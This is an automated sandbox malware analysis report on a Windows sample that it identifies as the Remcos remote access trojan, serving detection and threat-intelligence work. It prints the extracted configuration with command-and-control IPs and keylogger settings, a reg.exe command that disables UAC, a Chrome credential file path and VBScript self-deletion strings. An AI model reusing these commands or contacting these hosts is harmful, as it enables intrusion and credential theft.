Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FPPhfkcDCh.exe

Overview

General Information

Sample name:FPPhfkcDCh.exe
renamed because original name is a hash value
Original sample name:e375d127ede7c4f45893d14e94e334672688b4861a5e2dfe54deda05a67b6727.exe
Analysis ID:1544723
MD5:c9312aa42f69cc66491124567e969f24
SHA1:f99cbdf260491fc99a0b4a1e40053056ab6b68f7
SHA256:e375d127ede7c4f45893d14e94e334672688b4861a5e2dfe54deda05a67b6727
Tags:873901exeuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for sample
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • FPPhfkcDCh.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\FPPhfkcDCh.exe" MD5: C9312AA42F69CC66491124567E969F24)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["101.99.93.169:80:1", "101.99.93.169:8080:0", "101.99.93.169:4899:1", "101.99.93.169:5000:0", "101.99.93.169:55000:0", "101.99.93.169:55055:1", "103.144.139.157:80:1", "103.144.139.157:8080:0", "65.21.245.7:8080:0", "65.21.245.7:80:1"], "Assigned name": "oe", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "one_fjyueo-T589A4", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "rmc"}
SourceRuleDescriptionAuthorStrings
FPPhfkcDCh.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    FPPhfkcDCh.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      FPPhfkcDCh.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        FPPhfkcDCh.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aab8:$a1: Remcos restarted by watchdog!
        • 0x6b030:$a3: %02i:%02i:%02i:%03i
        FPPhfkcDCh.exeREMCOS_RAT_variantsunknownunknown
        • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64b7c:$str_b2: Executing file:
        • 0x65bfc:$str_b3: GetDirectListeningPort
        • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65728:$str_b7: \update.vbs
        • 0x64ba4:$str_b9: Downloaded file:
        • 0x64b90:$str_b10: Downloading file:
        • 0x64c34:$str_b12: Failed to upload file:
        • 0x65bc4:$str_b13: StartForward
        • 0x65be4:$str_b14: StopForward
        • 0x65680:$str_b15: fso.DeleteFile "
        • 0x65614:$str_b16: On Error Resume Next
        • 0x656b0:$str_b17: fso.DeleteFolder "
        • 0x64c24:$str_b18: Uploaded file:
        • 0x64be4:$str_b19: Unable to delete:
        • 0x65648:$str_b20: while fso.FileExists("
        • 0x650c1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        C:\ProgramData\rmc\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x134b8:$a1: Remcos restarted by watchdog!
                • 0x13a30:$a3: %02i:%02i:%02i:%03i
                00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  Click to see the 8 entries
                  SourceRuleDescriptionAuthorStrings
                  0.2.FPPhfkcDCh.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    0.2.FPPhfkcDCh.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                      0.2.FPPhfkcDCh.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        0.2.FPPhfkcDCh.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                        • 0x6aab8:$a1: Remcos restarted by watchdog!
                        • 0x6b030:$a3: %02i:%02i:%02i:%03i
                        0.2.FPPhfkcDCh.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                        • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                        • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                        • 0x64b7c:$str_b2: Executing file:
                        • 0x65bfc:$str_b3: GetDirectListeningPort
                        • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                        • 0x65728:$str_b7: \update.vbs
                        • 0x64ba4:$str_b9: Downloaded file:
                        • 0x64b90:$str_b10: Downloading file:
                        • 0x64c34:$str_b12: Failed to upload file:
                        • 0x65bc4:$str_b13: StartForward
                        • 0x65be4:$str_b14: StopForward
                        • 0x65680:$str_b15: fso.DeleteFile "
                        • 0x65614:$str_b16: On Error Resume Next
                        • 0x656b0:$str_b17: fso.DeleteFolder "
                        • 0x64c24:$str_b18: Uploaded file:
                        • 0x64be4:$str_b19: Unable to delete:
                        • 0x65648:$str_b20: while fso.FileExists("
                        • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                        Click to see the 7 entries

                        System Summary

                        barindex
                        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 101.99.93.169, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\FPPhfkcDCh.exe, Initiated: true, ProcessId: 7560, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-29T16:49:09.576799+010020365941Malware Command and Control Activity Detected192.168.2.454537101.99.93.1694899TCP
                        2024-10-29T16:49:09.576799+010020365941Malware Command and Control Activity Detected192.168.2.454520101.99.93.16955055TCP
                        2024-10-29T16:49:18.331024+010020365941Malware Command and Control Activity Detected192.168.2.449730101.99.93.16980TCP
                        2024-10-29T16:49:35.381112+010020365941Malware Command and Control Activity Detected192.168.2.449734101.99.93.1694899TCP
                        2024-10-29T16:50:00.911421+010020365941Malware Command and Control Activity Detected192.168.2.449741101.99.93.16955055TCP
                        2024-10-29T16:50:09.423220+010020365941Malware Command and Control Activity Detected192.168.2.454242103.144.139.15780TCP
                        2024-10-29T16:50:27.383706+010020365941Malware Command and Control Activity Detected192.168.2.45433465.21.245.780TCP
                        2024-10-29T16:50:36.882802+010020365941Malware Command and Control Activity Detected192.168.2.454345101.99.93.16980TCP
                        2024-10-29T16:50:53.869680+010020365941Malware Command and Control Activity Detected192.168.2.454437101.99.93.1694899TCP
                        2024-10-29T16:51:11.199633+010020365941Malware Command and Control Activity Detected192.168.2.454521103.144.139.15780TCP
                        2024-10-29T16:51:12.129617+010020365941Malware Command and Control Activity Detected192.168.2.45452465.21.245.780TCP
                        2024-10-29T16:51:21.688865+010020365941Malware Command and Control Activity Detected192.168.2.454525101.99.93.16980TCP
                        2024-10-29T16:51:30.229680+010020365941Malware Command and Control Activity Detected192.168.2.454527101.99.93.1694899TCP
                        2024-10-29T16:51:55.713142+010020365941Malware Command and Control Activity Detected192.168.2.454530101.99.93.16955055TCP
                        2024-10-29T16:52:04.217085+010020365941Malware Command and Control Activity Detected192.168.2.454531103.144.139.15780TCP
                        2024-10-29T16:52:22.077761+010020365941Malware Command and Control Activity Detected192.168.2.45453465.21.245.780TCP
                        2024-10-29T16:52:31.567828+010020365941Malware Command and Control Activity Detected192.168.2.454535101.99.93.16980TCP
                        2024-10-29T16:53:05.647777+010020365941Malware Command and Control Activity Detected192.168.2.454540101.99.93.16955055TCP
                        2024-10-29T16:53:14.149902+010020365941Malware Command and Control Activity Detected192.168.2.454541103.144.139.15780TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-29T16:49:18.338519+010020327761Malware Command and Control Activity Detected192.168.2.449731101.99.93.1698080TCP
                        2024-10-29T16:49:35.387862+010020327761Malware Command and Control Activity Detected192.168.2.449739101.99.93.1695000TCP
                        2024-10-29T16:49:43.913837+010020327761Malware Command and Control Activity Detected192.168.2.449740101.99.93.16955000TCP
                        2024-10-29T16:50:09.431846+010020327761Malware Command and Control Activity Detected192.168.2.454244103.144.139.1578080TCP
                        2024-10-29T16:50:17.927121+010020327761Malware Command and Control Activity Detected192.168.2.45429065.21.245.78080TCP
                        2024-10-29T16:50:36.889844+010020327761Malware Command and Control Activity Detected192.168.2.454391101.99.93.1698080TCP
                        2024-10-29T16:50:53.897876+010020327761Malware Command and Control Activity Detected192.168.2.454485101.99.93.1695000TCP
                        2024-10-29T16:51:02.382671+010020327761Malware Command and Control Activity Detected192.168.2.454519101.99.93.16955000TCP
                        2024-10-29T16:51:11.207683+010020327761Malware Command and Control Activity Detected192.168.2.454522103.144.139.1578080TCP
                        2024-10-29T16:51:11.236421+010020327761Malware Command and Control Activity Detected192.168.2.45452365.21.245.78080TCP
                        2024-10-29T16:51:21.740518+010020327761Malware Command and Control Activity Detected192.168.2.454526101.99.93.1698080TCP
                        2024-10-29T16:51:30.245474+010020327761Malware Command and Control Activity Detected192.168.2.454528101.99.93.1695000TCP
                        2024-10-29T16:51:38.736784+010020327761Malware Command and Control Activity Detected192.168.2.454529101.99.93.16955000TCP
                        2024-10-29T16:52:04.233966+010020327761Malware Command and Control Activity Detected192.168.2.454532103.144.139.1578080TCP
                        2024-10-29T16:52:12.728864+010020327761Malware Command and Control Activity Detected192.168.2.45453365.21.245.78080TCP
                        2024-10-29T16:52:31.602991+010020327761Malware Command and Control Activity Detected192.168.2.454536101.99.93.1698080TCP
                        2024-10-29T16:52:40.151594+010020327761Malware Command and Control Activity Detected192.168.2.454538101.99.93.1695000TCP
                        2024-10-29T16:52:48.658785+010020327761Malware Command and Control Activity Detected192.168.2.454539101.99.93.16955000TCP
                        2024-10-29T16:53:14.162067+010020327761Malware Command and Control Activity Detected192.168.2.454542103.144.139.1578080TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: FPPhfkcDCh.exeAvira: detected
                        Source: 00000000.00000002.4124407338.00000000006BE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["101.99.93.169:80:1", "101.99.93.169:8080:0", "101.99.93.169:4899:1", "101.99.93.169:5000:0", "101.99.93.169:55000:0", "101.99.93.169:55055:1", "103.144.139.157:80:1", "103.144.139.157:8080:0", "65.21.245.7:8080:0", "65.21.245.7:80:1"], "Assigned name": "oe", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "one_fjyueo-T589A4", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "rmc"}
                        Source: FPPhfkcDCh.exeReversingLabs: Detection: 84%
                        Source: Yara matchFile source: FPPhfkcDCh.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124407338.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: FPPhfkcDCh.exe PID: 7560, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                        Source: FPPhfkcDCh.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_004338C8
                        Source: FPPhfkcDCh.exe, 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_62b90072-d

                        Exploits

                        barindex
                        Source: Yara matchFile source: FPPhfkcDCh.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: FPPhfkcDCh.exe PID: 7560, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00407538 _wcslen,CoGetObject,0_2_00407538
                        Source: FPPhfkcDCh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49731 -> 101.99.93.169:8080
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49734 -> 101.99.93.169:4899
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49739 -> 101.99.93.169:5000
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49740 -> 101.99.93.169:55000
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 101.99.93.169:55055
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54242 -> 103.144.139.157:80
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54244 -> 103.144.139.157:8080
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49730 -> 101.99.93.169:80
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54290 -> 65.21.245.7:8080
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54334 -> 65.21.245.7:80
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54345 -> 101.99.93.169:80
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54391 -> 101.99.93.169:8080
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54437 -> 101.99.93.169:4899
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54485 -> 101.99.93.169:5000
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54523 -> 65.21.245.7:8080
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54522 -> 103.144.139.157:8080
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54526 -> 101.99.93.169:8080
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54525 -> 101.99.93.169:80
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54521 -> 103.144.139.157:80
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54534 -> 65.21.245.7:80
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54541 -> 103.144.139.157:80
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54529 -> 101.99.93.169:55000
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54536 -> 101.99.93.169:8080
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54519 -> 101.99.93.169:55000
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54535 -> 101.99.93.169:80
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54524 -> 65.21.245.7:80
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54530 -> 101.99.93.169:55055
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54528 -> 101.99.93.169:5000
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54531 -> 103.144.139.157:80
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54532 -> 103.144.139.157:8080
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54533 -> 65.21.245.7:8080
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54527 -> 101.99.93.169:4899
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54540 -> 101.99.93.169:55055
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54542 -> 103.144.139.157:8080
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54538 -> 101.99.93.169:5000
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:54539 -> 101.99.93.169:55000
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54537 -> 101.99.93.169:4899
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:54520 -> 101.99.93.169:55055
                        Source: Malware configuration extractorIPs: 101.99.93.169
                        Source: Malware configuration extractorIPs: 101.99.93.169
                        Source: Malware configuration extractorIPs: 101.99.93.169
                        Source: Malware configuration extractorIPs: 101.99.93.169
                        Source: Malware configuration extractorIPs: 101.99.93.169
                        Source: Malware configuration extractorIPs: 101.99.93.169
                        Source: Malware configuration extractorIPs: 103.144.139.157
                        Source: Malware configuration extractorIPs: 103.144.139.157
                        Source: Malware configuration extractorIPs: 65.21.245.7
                        Source: Malware configuration extractorIPs: 65.21.245.7
                        Source: global trafficTCP traffic: 101.99.93.169 ports 5000,8080,0,55000,55055,8,80,4899
                        Source: global trafficTCP traffic: 192.168.2.4:49731 -> 101.99.93.169:8080
                        Source: global trafficTCP traffic: 192.168.2.4:54244 -> 103.144.139.157:8080
                        Source: global trafficTCP traffic: 192.168.2.4:54290 -> 65.21.245.7:8080
                        Source: Joe Sandbox ViewIP Address: 65.21.245.7 65.21.245.7
                        Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
                        Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
                        Source: Joe Sandbox ViewASN Name: GIGABIT-MYGigabitHostingSdnBhdMY GIGABIT-MYGigabitHostingSdnBhdMY
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.93.169
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
